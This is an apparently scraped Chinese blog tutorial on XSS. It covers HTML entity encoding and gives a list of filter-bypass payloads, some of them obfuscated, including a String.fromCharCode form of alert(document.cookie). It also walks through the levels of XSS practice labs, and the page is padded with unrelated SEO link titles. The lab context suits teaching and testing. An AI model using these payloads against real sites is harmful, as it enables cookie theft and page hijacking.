当前位置: 首页 > news >正文

网站导航设计模板友情链接检测平台

网站导航设计模板,友情链接检测平台,公司如何建设网站首页,网站规划建设方案模板HTML实体化编码 为了避免 XSS 攻击&#xff0c;会将<>编码为<与>&#xff0c;这些就是 HTML 实体编码。 编码前编码后不可分的空格 < (小于符号)< > (大于符号)> & (与符号)&amp;″ (双引号)&quot;’ (单引号)&apos;© (版权符…

HTML实体化编码

为了避免 XSS 攻击,会将<>编码为&lt;&gt;,这些就是 HTML 实体编码。

编码前编码后
不可分的空格&nbsp;
< (小于符号)&lt;
> (大于符号)&gt;
& (与符号)&amp;
″ (双引号)&quot;
’ (单引号)&apos;
© (版权符号)&copy;
he.encode('<img src=""></img>') // "&#x3C;img src=&#x22;&#x22;&#x3E;&#x3C;/img&#x3E;"// 转义
he.escape('<img src=""></img>') // "&lt;img src=&quot;&quot;&gt;&lt;/img&gt;"

常见的绕过payload

<img src="x" onerror=alert(1)>
<img src=1 οnmοuseοver=alert('xss')>
<a href="javascript:alert(1)">baidu</a>
<a href="javascript:aaa" onmouseover="alert(/xss/)">aa</a>
<script>alert('xss')</script>
<script>prompt('xss')</script>
<input value="" οnclick=alert('xss') type="text">
<input name="name" value="" οnmοuseοver=prompt('xss') bad="">
<iframe src="javascript:alert('xss')"><iframe>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">
<iframe src="aaa" οnmοuseοver=alert('xss') /><iframe>
<iframe src="javascript&colon;prompt&lpar;`xss`&rpar;"></iframe>
<svg onload=alert(1)>
<input name="name" value="" οnmοuseοver=prompt('xss') bad=“”>
<input type=“hidden” accesskey=“X” onclick=“alert(1)>
eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,
111,107,105,101,41)) 适用于绕过黑名单 alert 在跨站中,String.fromCharCode 主要是使到
一些已经被列入黑名单的关键字或语句安全通过检测,把关键字或语句转换成为 ASCII 码,
然后再用 String.fromCharCode 还原,因为大多数的过滤系统都不会把 String.fromCharCode
加以过滤,例如关键字 alert 被过滤掉,那就可以这么利用 alert(document.cookie)
<img src="1" onerror=alert(1)>
<img src="1" onerror=alert&#40;1&#41;>(实体化()
<img src=1 onerror=alert&#40&#41>
<script>\u0061\u006c\u0065\u0072\u0074(1)</script>
<img src="1" οnerrοr=location="javascript:alert(1)”>
<img src="1" οnerrοr=location="javascript:alert%281%29”>

靶场实战(一)

欢迎来到XSS挑战

Level 1

通过观察页面,猜测因该是一个传参name=test可以下手

查看页面源代码

从这里我们可以看到它将name的参数值,插入到了<h2> </h2>标签之间,第一关没有过滤
payload:name=<script>alert('xss')</script>

Level 2

一个搜索框,故技重施失败了,判断他有过滤

查看源代码,上面一行是查询的回显,可以看到被实体化编码了,下面一行被双引号包裹

上面的实体化编码无法绕过了,现在的目标转化为下面一行,那就是闭合!
payload: "><script>alert(1)</script>//
或者 "><script>alert(1)</script><

实测也可以不用注释后面的">,说明HTML属于弱类型,校验不严格,另外查看这关源代码,调用的函数是 htmlspecialchars() 它的作用就是让 < 和 > 被HTML实体化编码
PHP htmlspecialchars() 函数

Level 3

还是搜索框,故技重施x2,无果,看源代码

这波看似没办法搞了,两边都被实体化了

仔细一想,两个尖括号以及被ban掉,

特殊事件 onmouseover onclick onfocuse 的介绍链接:
HTML onmouseover 事件属性 | 菜鸟教程
HTML onclick 事件属性 | 菜鸟教程
HTML onfocus 事件属性 | 菜鸟教程

函数效果
οnmοuseοver=alert(1)鼠标指针移至图片之上时弹窗
οnclick=alert(1)输入域获得焦点时弹窗
οnfοcus=alert(1)单击鼠标时弹窗

还有一个问题就是闭合这两个引号,闭合前面的,注释或者闭合后面的,这里跟上一关的标签闭合不一样,是比较严格的,不闭合属性中的值会无法执行
payload:' onmouseover=alert(1) //
或者: ' onmouseover=alert(1) x='

靶场实战(二)

alert(1)

0x00

啥也没有直接来吧

0x01

前面的<textarea>标签有个特性,无法创建其他标签,那就闭合掉

0x02

input标签,直接onmouseover+闭合连招,
还有种方法是闭合+新开标签 "> <script>alert(1)</script>
当然也可以用"><img src="x" onerror="alert(1)">也是很好用的

0x03

过滤了左右括号 () 那就用反引号`绕过

http://www.yayakq.cn/news/776491/

相关文章:

  • 网站在网站网站在哪里找到的金乡做网站 亿九
  • 保定信息平台网站建设企业网站最底下做的是什么
  • 建筑公司logo设计大全seo建站优化价格表
  • 用照片做视频的模板下载网站好商会网站建设招标方案
  • 温州网站建设方案文档制作网站交换链接友情链接的作用
  • 做会议活动的网站如何制作一个自己的网站
  • 网站制作公司怎么赚钱东莞官方网站
  • 快盘做网站服务器佛山搭建建网站哪家好
  • 网站备案提交信息吗wordpress站点统计小工具
  • 创业论坛网站有哪些wordpress主题柚子皮zip
  • 中苏园林建设集团网站城乡和住房建设部网站
  • 二手车网站制作贵吗wordpress防下载
  • 寻找锦州网站建设建立网站数据库实验报告
  • 海外网站建设平台seo是一种利用搜索引擎
  • 学习网站建设0学起建e网3d模型库
  • 网站落地页制作厦门小程序开发的公司
  • 黄页网站数据来源软件开发外包是什么意思
  • 台州网站制作方案wordpress主题大小
  • 阿里云上的网站空间好用吗沂南建设局网站
  • 个人接做网站多少钱wordpress 商城主题 汉
  • 网站开发和网站制作的区别东莞推广就莞用服务平台
  • 网站建设教学方法探究做网站购买域名
  • 玉溪网站制作公司京东网上商城购物平台
  • 吉林省绥中县城乡建设局网站用旧电脑做网站
  • 北京网站建设方案书深圳网站网页制作
  • 济南公司网站推广优化最大的百度指数分析大数据
  • 做网站先做ue企业手机网站建设报价
  • 谷歌有做网站建设学校 网站建设 招标
  • 建网站一般要多少钱wordpress免谷歌apk
  • 公司网站数据库表设计wordpress 存储视频教程